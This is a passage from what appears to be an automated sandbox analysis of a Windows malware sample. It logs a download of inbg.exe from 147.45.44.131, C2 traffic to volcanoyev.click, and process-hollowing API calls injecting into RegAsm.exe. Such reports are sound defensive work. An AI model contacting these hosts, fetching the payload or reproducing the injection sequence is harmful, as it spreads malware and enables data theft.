                                  Dec 24, 2024 08:18:01.282707930 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:01.282809973 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:01.282948017 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:01.284993887 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:01.285043955 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:02.509819984 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:02.509975910 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:02.516519070 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:02.516570091 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:02.516849041 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:02.558190107 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:02.565458059 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:02.565491915 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:02.565604925 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.381092072 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.381181002 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.381264925 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.397111893 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.397170067 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.397201061 CET49705443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.397218943 CET44349705172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.414094925 CET49706443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.414202929 CET44349706172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.414295912 CET49706443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.414591074 CET49706443192.168.2.5172.67.195.241
                                  Dec 24, 2024 08:18:08.414629936 CET44349706172.67.195.241192.168.2.5
                                  Dec 24, 2024 08:18:08.905028105 CET49706443192.168.2.5172.67.195.241
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 24, 2024 08:18:00.943578005 CET6328653192.168.2.51.1.1.1
                                  Dec 24, 2024 08:18:01.273890972 CET53632861.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 24, 2024 08:18:00.943578005 CET192.168.2.51.1.1.10x8b83Standard query (0)volcanoyev.clickA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 24, 2024 08:18:01.273890972 CET1.1.1.1192.168.2.50x8b83No error (0)volcanoyev.click172.67.195.241A (IP address)IN (0x0001)false
                                  Dec 24, 2024 08:18:01.273890972 CET1.1.1.1192.168.2.50x8b83No error (0)volcanoyev.click104.21.52.56A (IP address)IN (0x0001)false
                                  • volcanoyev.click
                                  • 147.45.44.131
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704147.45.44.131807136C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 24, 2024 08:17:57.999418974 CET180OUTGET /infopage/inbg.exe HTTP/1.1
                                  X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                  Host: 147.45.44.131
                                  Connection: Keep-Alive
                                  Dec 24, 2024 08:17:59.259567976 CET1236INHTTP/1.1 200 OK
                                  Date: Tue, 24 Dec 2024 07:17:59 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                  ETag: "49c00-629dc654be596"
                                  Accept-Ranges: bytes
                                  Content-Length: 302080
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B
                                  Dec 24, 2024 08:17:59.259598017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: D$t(8uxuxuD$D$jP1USWV(|$@1t$<.]Srt%E.]SdrEu
                                  Dec 24, 2024 08:17:59.259613991 CET1236INData Raw: 30 44 00 83 c4 04 85 c0 0f 84 9d 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 81 02 00 00 89 c7 8b 5c 24 18 50 e8 96 6d 00 00 83 c4 04 39 c3 0f 85 b6 02 00 00 8b 1e 0f b6 2b 55 e8 30 6e 00 00 83 c4 04 85 c0 74
                                  Data Ascii: 0D@H\$Pm9+U0ntC+UnCuK<:Ct$VIiPWt$l.]SmtE.]SmEuM,TE.]SmEu}
                                  Dec 24, 2024 08:17:59.259716988 CET672INData Raw: 00 8b 54 24 0c 8b 4c 24 30 83 c4 0c 85 c0 75 a8 8b 41 10 8b 04 98 85 c0 74 10 83 78 04 02 bf 00 00 00 00 75 07 8b 78 08 eb 02 31 ff 89 f8 83 c4 10 5e 5f 5b 5d c3 cc cc 8b 4c 24 04 31 c0 85 c9 74 09 83 79 04 02 75 03 8b 41 08 c3 cc cc cc cc cc cc
                                  Data Ascii: T$L$0uAtxux1^_[]L$1tyuAUSWV\$|$,t6t$0t.V~hD$PVL$4i ]D$sD$^_[]!AD$$CMt#D$t$<tA9uA4Vh
                                  Dec 24, 2024 08:17:59.259732008 CET1236INData Raw: 4c 24 2c 83 c4 08 89 c2 8b 71 20 8d 6e ff 89 f0 83 e8 01 89 44 24 0c 0f 82 92 00 00 00 21 d5 8b 41 04 89 44 24 08 89 14 24 eb 11 90 90 90 90 90 90 90 90 90 90 90 90 90 45 4e 74 6e 89 e8 23 44 24 0c 8b 7c 24 08 8b 1c 87 83 fb ff 74 5c 8b 41 08 39
                                  Data Ascii: L$,q nD$!AD$$ENtn#D$|$t\A9uA<WeT$L$(;D$ut$Wt$0eT$L$0uAtxux^_[]USWV|$0l$,j.WetF"
                                  Dec 24, 2024 08:17:59.259748936 CET1236INData Raw: 83 c4 04 5e 5f ff 25 00 30 44 00 cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 b8 ff ff ff ff 83 7c 24 24 00 0f 84 d3 00 00 00 83 7c 24 28 00 0f 84 c8 00 00 00 83 7c 24 2c 00 0f 84 bd 00 00 00 8b 74 24 28 56 e8 39 61 00 00 83 c4 04 89 04 24 50
                                  Data Ascii: ^_%0DUSWV|$$|$(|$,t$(V9a$PVL$$y wD$A;Ar>umt$(`D$L$$y wD$AQt$(4AQAt$,4AQ,AQ|$
                                  Dec 24, 2024 08:17:59.259764910 CET1236INData Raw: b1 02 00 00 89 fb eb 17 90 90 90 90 90 90 90 90 8d 5e 02 89 19 80 7e 02 00 0f 84 96 02 00 00 89 de 43 89 19 0f b6 6e 01 83 fd 5c 74 e3 85 ed 0f 84 80 02 00 00 83 fd 22 75 e5 89 54 24 0c 83 c6 02 89 31 89 f0 31 f8 89 f9 f7 d1 21 f1 01 c9 29 c1 89
                                  Data Ascii: ^~Cn\t"uT$11!)L$AP0D=D$GG$<\u,CSk$D"< FEE);L$r~/
                                  Dec 24, 2024 08:17:59.259787083 CET1236INData Raw: 01 00 00 ba af a9 6e 5e 89 f0 f7 e2 c1 ea 0b 69 c2 b0 15 00 00 89 f3 29 c3 eb 47 90 8b 44 24 04 2b 04 24 01 c5 8b 74 24 08 89 c8 ba 71 80 07 80 f7 e2 89 d3 c1 eb 0f 89 f8 ba 71 80 07 80 f7 e2 69 c3 f1 ff 00 00 29 c1 c1 ea 0f 69 c2 f1 ff 00 00 29
                                  Data Ascii: n^i)GD$+$t$qqi)i)+t$1\$t$rs$1Dt!1\|C\$DtD|B9rt$$);D$
                                  Dec 24, 2024 08:17:59.260010004 CET1236INData Raw: 31 c0 83 7e 5c 00 0f 94 c0 eb 02 31 c0 5e 5f c3 cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 40 8b 6c 24 54 8b 85 80 00 00 00 89 44 24 30 8b 95 84 00 00 00 8b 85 88 00 00 00 89 44 24 0c 8d 85 90 00 00 00 89 44 24 28 8d 85 72 92 00 00 89 44 24 34 8d
                                  Data Ascii: 1~\1^_USWV@l$TD$0D$D$(rD$4jD$<2D$jUT$|$T$tu M$1w3F|$0>] 3M$L$)L$9r
                                  Dec 24, 2024 08:17:59.260026932 CET1236INData Raw: 24 18 29 d9 0f b7 f9 39 fd 0f 82 3b 01 00 00 81 e3 ff 7f 00 00 8d 0c 18 8b 74 24 54 0f b6 54 24 20 38 94 0e 90 00 00 00 75 12 0f b6 54 24 03 38 94 31 8f 00 00 00 0f 84 98 00 00 00 0f b7 9c 5e 72 92 01 00 85 db 0f 84 fe 00 00 00 8b 4c 24 18 29 d9
                                  Data Ascii: $)9;t$TT$ 8uT$81^rL$)9T$ 8uT$81tR^rL$)94T$TL$ 82L$8trL$(41T$8:uA9
                                  Dec 24, 2024 08:17:59.379795074 CET1236INData Raw: ff ff ff c7 45 38 08 00 00 00 8b 75 28 8d 7e 01 89 7d 28 89 75 2c 81 f9 00 02 00 00 0f 83 b5 fd ff ff 81 e1 ff 01 00 00 8d 89 6a 09 44 00 8b 54 24 04 0f b6 09 66 ff 84 4d d2 83 00 00 0f b7 8c 00 e4 0b 44 00 66 ff 84 4d 92 81 00 00 c7 45 50 00 00
                                  Data Ascii: E8u(~}(u,jDT$fMDfMEPD$D$TL$@^_[]USWVPt$Fu1>u,F+F@;F$>uF|)=LrNtrN0$LF4FXF\


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549705172.67.195.2414432172C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-24 07:18:02 UTC263OUTPOST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: volcanoyev.click
                                  2024-12-24 07:18:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                  Data Ascii: act=life
                                  2024-12-24 07:18:08 UTC1123INHTTP/1.1 200 OK
                                  Date: Tue, 24 Dec 2024 07:18:08 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: PHPSESSID=48juuodvbti4lefvm3gr71qkco; expires=Sat, 19 Apr 2025 01:04:47 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  X-XSS-Protection: 1; mode=block
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3V0wZIydSeHRT02IgRnsdyZnucXKQDbz4RYRN7VDu4CEszU4gO1Xzktbm8sz0xQhJNR%2BWU3vXa6OgmGtDP77PItZ3E5i%2FV%2F9QORdYs454yA3h8%2FeiSO6H6pSn1qg7OyUNggc"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8f6ed0ab6f2f8c60-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=685&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1585233&cwnd=67&unsent_bytes=0&cid=29ab973c83e71d06&ts=5889&x=0"
                                  2024-12-24 07:18:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                  Data Ascii: 2ok
                                  2024-12-24 07:18:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:02:17:57
                                  Start date:24/12/2024
                                  Path:C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\qoqD1RxV0F.exe"
                                  Imagebase:0xf0000
                                  File size:44'544 bytes
                                  MD5 hash:896078E90B854C34F629D64493E4166A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:02:17:59
                                  Start date:24/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"
                                  Imagebase:0x7c0000
                                  File size:2'141'552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:3
                                  Start time:02:17:59
                                  Start date:24/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:02:18:00
                                  Start date:24/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES634D.tmp" "c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP"
                                  Imagebase:0x560000
                                  File size:46'832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:5
                                  Start time:02:18:00
                                  Start date:24/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                  Imagebase:0x400000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:02:18:00
                                  Start date:24/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                  Imagebase:0x380000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:02:18:00
                                  Start date:24/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                  Imagebase:0x5c0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:20.7%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:11.5%
                                    Total number of Nodes:52
                                    Total number of Limit Nodes:0
                                    execution_graph 2133 2382b69 2134 2382b77 2133->2134 2135 2382738 NtUnmapViewOfSection 2134->2135 2136 2382730 NtUnmapViewOfSection 2134->2136 2137 2382318 ResumeThread 2134->2137 2138 2382320 ResumeThread 2134->2138 2139 2382568 WriteProcessMemory 2134->2139 2140 2382560 WriteProcessMemory 2134->2140 2141 23823c8 Wow64SetThreadContext 2134->2141 2142 23823d0 Wow64SetThreadContext 2134->2142 2143 23824a8 VirtualAllocEx 2134->2143 2144 23824a0 VirtualAllocEx 2134->2144 2145 2382658 ReadProcessMemory 2134->2145 2146 2382650 ReadProcessMemory 2134->2146 2147 23827f0 CreateProcessA 2134->2147 2148 23827e4 CreateProcessA 2134->2148 2135->2134 2136->2134 2137->2134 2138->2134 2139->2134 2140->2134 2141->2134 2142->2134 2143->2134 2144->2134 2145->2134 2146->2134 2147->2134 2148->2134 2061 2382bd1 2062 2382b9e 2061->2062 2069 2382568 WriteProcessMemory 2062->2069 2070 2382560 WriteProcessMemory 2062->2070 2071 23823c8 Wow64SetThreadContext 2062->2071 2072 23823d0 Wow64SetThreadContext 2062->2072 2077 23827e4 2062->2077 2081 23827f0 2062->2081 2085 2382650 2062->2085 2089 2382658 2062->2089 2093 2382738 2062->2093 2097 2382730 2062->2097 2101 23824a0 2062->2101 2105 23824a8 2062->2105 2109 2382318 2062->2109 2113 2382320 2062->2113 2069->2062 2070->2062 2071->2062 2072->2062 2078 2382879 CreateProcessA 2077->2078 2080 2382a3b 2078->2080 2080->2080 2082 2382879 CreateProcessA 2081->2082 2084 2382a3b 2082->2084 2086 23826a3 ReadProcessMemory 2085->2086 2088 23826e7 2086->2088 2088->2062 2090 23826a3 ReadProcessMemory 2089->2090 2092 23826e7 2090->2092 2092->2062 2094 2382778 NtUnmapViewOfSection 2093->2094 2096 23827ac 2094->2096 2096->2062 2098 2382778 NtUnmapViewOfSection 2097->2098 2100 23827ac 2098->2100 2100->2062 2102 23824e8 VirtualAllocEx 2101->2102 2104 2382525 2102->2104 2104->2062 2106 23824e8 VirtualAllocEx 2105->2106 2108 2382525 2106->2108 2108->2062 2110 2382320 ResumeThread 2109->2110 2112 2382391 2110->2112 2112->2062 2114 2382360 ResumeThread 2113->2114 2116 2382391 2114->2116 2116->2062

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 192 2382730-23827aa NtUnmapViewOfSection 195 23827ac-23827b2 192->195 196 23827b3-23827d8 192->196 195->196
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 0238279D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 54c53c88d659bf0b081f903559db4d7d560b4d84f7b2374358d4179e647cbd96
                                    • Instruction ID: 8ce3d4ce4e3233e729d71cb1695b87b550e088d34eab366b30bc2c1026f3a423
                                    • Opcode Fuzzy Hash: 54c53c88d659bf0b081f903559db4d7d560b4d84f7b2374358d4179e647cbd96
                                    • Instruction Fuzzy Hash: 8B113A759003488ECB20DFAAD4857EFFFF5EF89314F248459D459A7240CB39A545CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 209 2382738-23827aa NtUnmapViewOfSection 212 23827ac-23827b2 209->212 213 23827b3-23827d8 209->213 212->213
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 0238279D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 3cdb0e91847c49df7eb879f3f0d903b2754e598c6a739bd2bb5a135cdf170de9
                                    • Instruction ID: 715921079bb368b7c6599bfb1bd621e521ff367e63a0889d14f7784c52f66d64
                                    • Opcode Fuzzy Hash: 3cdb0e91847c49df7eb879f3f0d903b2754e598c6a739bd2bb5a135cdf170de9
                                    • Instruction Fuzzy Hash: 901116B59003488BCB10EFAAC4457EFFFF5EF88324F208419D519A7240CB79A544CBA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 23827e4-2382885 2 23828be-23828de 0->2 3 2382887-2382891 0->3 8 23828e0-23828ea 2->8 9 2382917-2382946 2->9 3->2 4 2382893-2382895 3->4 5 23828b8-23828bb 4->5 6 2382897-23828a1 4->6 5->2 10 23828a3 6->10 11 23828a5-23828b4 6->11 8->9 12 23828ec-23828ee 8->12 19 2382948-2382952 9->19 20 238297f-2382a39 CreateProcessA 9->20 10->11 11->11 13 23828b6 11->13 14 23828f0-23828fa 12->14 15 2382911-2382914 12->15 13->5 17 23828fc 14->17 18 23828fe-238290d 14->18 15->9 17->18 18->18 21 238290f 18->21 19->20 22 2382954-2382956 19->22 31 2382a3b-2382a41 20->31 32 2382a42-2382ac8 20->32 21->15 24 2382958-2382962 22->24 25 2382979-238297c 22->25 26 2382964 24->26 27 2382966-2382975 24->27 25->20 26->27 27->27 29 2382977 27->29 29->25 31->32 42 2382ad8-2382adc 32->42 43 2382aca-2382ace 32->43 44 2382aec-2382af0 42->44 45 2382ade-2382ae2 42->45 43->42 46 2382ad0-2382ad3 call 2380b04 43->46 48 2382b00-2382b04 44->48 49 2382af2-2382af6 44->49 45->44 47 2382ae4-2382ae7 call 2380b04 45->47 46->42 47->44 53 2382b16-2382b1d 48->53 54 2382b06-2382b0c 48->54 49->48 52 2382af8-2382afb call 2380b04 49->52 52->48 56 2382b1f-2382b2e 53->56 57 2382b34 53->57 54->53 56->57 58 2382b35 57->58 58->58
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02382A26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 77edb2f76af38776f34726aee811470c5515bc4987b198eb394f573dcb47117b
                                    • Instruction ID: 0462fd167e2f3b018742641e095441096d65c16c3e2dee051662c30a8c406194
                                    • Opcode Fuzzy Hash: 77edb2f76af38776f34726aee811470c5515bc4987b198eb394f573dcb47117b
                                    • Instruction Fuzzy Hash: A6A14871D00359CFEB25EF68C8407EEBBB2BF48314F1481A9D809AB280DB749985CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 60 23827f0-2382885 62 23828be-23828de 60->62 63 2382887-2382891 60->63 68 23828e0-23828ea 62->68 69 2382917-2382946 62->69 63->62 64 2382893-2382895 63->64 65 23828b8-23828bb 64->65 66 2382897-23828a1 64->66 65->62 70 23828a3 66->70 71 23828a5-23828b4 66->71 68->69 72 23828ec-23828ee 68->72 79 2382948-2382952 69->79 80 238297f-2382a39 CreateProcessA 69->80 70->71 71->71 73 23828b6 71->73 74 23828f0-23828fa 72->74 75 2382911-2382914 72->75 73->65 77 23828fc 74->77 78 23828fe-238290d 74->78 75->69 77->78 78->78 81 238290f 78->81 79->80 82 2382954-2382956 79->82 91 2382a3b-2382a41 80->91 92 2382a42-2382ac8 80->92 81->75 84 2382958-2382962 82->84 85 2382979-238297c 82->85 86 2382964 84->86 87 2382966-2382975 84->87 85->80 86->87 87->87 89 2382977 87->89 89->85 91->92 102 2382ad8-2382adc 92->102 103 2382aca-2382ace 92->103 104 2382aec-2382af0 102->104 105 2382ade-2382ae2 102->105 103->102 106 2382ad0-2382ad3 call 2380b04 103->106 108 2382b00-2382b04 104->108 109 2382af2-2382af6 104->109 105->104 107 2382ae4-2382ae7 call 2380b04 105->107 106->102 107->104 113 2382b16-2382b1d 108->113 114 2382b06-2382b0c 108->114 109->108 112 2382af8-2382afb call 2380b04 109->112 112->108 116 2382b1f-2382b2e 113->116 117 2382b34 113->117 114->113 116->117 118 2382b35 117->118 118->118
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02382A26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: eefa8ac7b20e779a3c364115bb1ab96bb0d6336b59056ace9115824099b2f012
                                    • Instruction ID: 22bdfe353a766a84501378611f792d095b4e1d3ba5b658843be012743e4e7c9b
                                    • Opcode Fuzzy Hash: eefa8ac7b20e779a3c364115bb1ab96bb0d6336b59056ace9115824099b2f012
                                    • Instruction Fuzzy Hash: 5A913971D00359CFEB25EF68C8407EEBBB2BF48314F148569E819AB280DB749985CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 120 2382560-23825b6 122 23825b8-23825c4 120->122 123 23825c6-2382605 WriteProcessMemory 120->123 122->123 125 238260e-238263e 123->125 126 2382607-238260d 123->126 126->125
                                    APIs
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 023825F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 7b661e444a3f3222c9ffd07af2794515bf7db6b3d1f2ae68dda2b57332d9dfea
                                    • Instruction ID: 6f80e0e1d00b71a941cf70c784c58f513487136c15ce22b480c616e7a05a627d
                                    • Opcode Fuzzy Hash: 7b661e444a3f3222c9ffd07af2794515bf7db6b3d1f2ae68dda2b57332d9dfea
                                    • Instruction Fuzzy Hash: 452146B59003499FCF10DFA9C981BEEBBF1FF48310F108429E919A7240D7789955DBA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 130 2382568-23825b6 132 23825b8-23825c4 130->132 133 23825c6-2382605 WriteProcessMemory 130->133 132->133 135 238260e-238263e 133->135 136 2382607-238260d 133->136 136->135
                                    APIs
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 023825F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
